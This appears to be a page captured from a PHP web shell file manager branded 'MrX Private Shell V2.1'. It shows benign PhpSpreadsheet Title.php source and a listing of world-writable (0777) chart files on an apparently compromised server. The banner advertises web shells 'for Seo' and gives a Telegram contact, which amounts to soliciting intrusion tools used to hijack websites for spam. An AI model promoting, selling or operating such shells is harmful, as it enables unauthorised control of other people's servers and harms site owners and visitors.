__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace PhpOffice\PhpSpreadsheet\Chart;
use PhpOffice\PhpSpreadsheet\RichText\RichText;
class Title
{
/**
* Title Caption.
*
* @var array|RichText|string
*/
private $caption = '';
/**
* Allow overlay of other elements?
*
* @var bool
*/
private $overlay = true;
/**
* Title Layout.
*
* @var ?Layout
*/
private $layout;
/**
* Create a new Title.
*
* @param array|RichText|string $caption
* @param ?Layout $layout
* @param bool $overlay
*/
public function __construct($caption = '', ?Layout $layout = null, $overlay = false)
{
$this->caption = $caption;
$this->layout = $layout;
$this->setOverlay($overlay);
}
/**
* Get caption.
*
* @return array|RichText|string
*/
public function getCaption()
{
return $this->caption;
}
public function getCaptionText(): string
{
$caption = $this->caption;
if (is_string($caption)) {
return $caption;
}
if ($caption instanceof RichText) {
return $caption->getPlainText();
}
$retVal = '';
foreach ($caption as $textx) {
/** @var RichText|string */
$text = $textx;
if ($text instanceof RichText) {
$retVal .= $text->getPlainText();
} else {
$retVal .= $text;
}
}
return $retVal;
}
/**
* Set caption.
*
* @param array|RichText|string $caption
*
* @return $this
*/
public function setCaption($caption)
{
$this->caption = $caption;
return $this;
}
/**
* Get allow overlay of other elements?
*
* @return bool
*/
public function getOverlay()
{
return $this->overlay;
}
/**
* Set allow overlay of other elements?
*
* @param bool $overlay
*/
public function setOverlay($overlay): void
{
$this->overlay = $overlay;
}
public function getLayout(): ?Layout
{
return $this->layout;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Renderer | Folder | 0777 |
|
|
| Axis.php | File | 8.25 KB | 0777 |
|
| AxisText.php | File | 1.04 KB | 0777 |
|
| Chart.php | File | 15.84 KB | 0777 |
|
| ChartColor.php | File | 4.18 KB | 0777 |
|
| DataSeries.php | File | 8.79 KB | 0777 |
|
| DataSeriesValues.php | File | 13.61 KB | 0777 |
|
| Exception.php | File | 170 B | 0777 |
|
| GridLines.php | File | 183 B | 0777 |
|
| Layout.php | File | 11.21 KB | 0777 |
|
| Legend.php | File | 4.26 KB | 0777 |
|
| PlotArea.php | File | 3.86 KB | 0777 |
|
| Properties.php | File | 30.66 KB | 0777 |
|
| Title.php | File | 2.14 KB | 0777 |
|
| TrendLine.php | File | 4.66 KB | 0777 |
|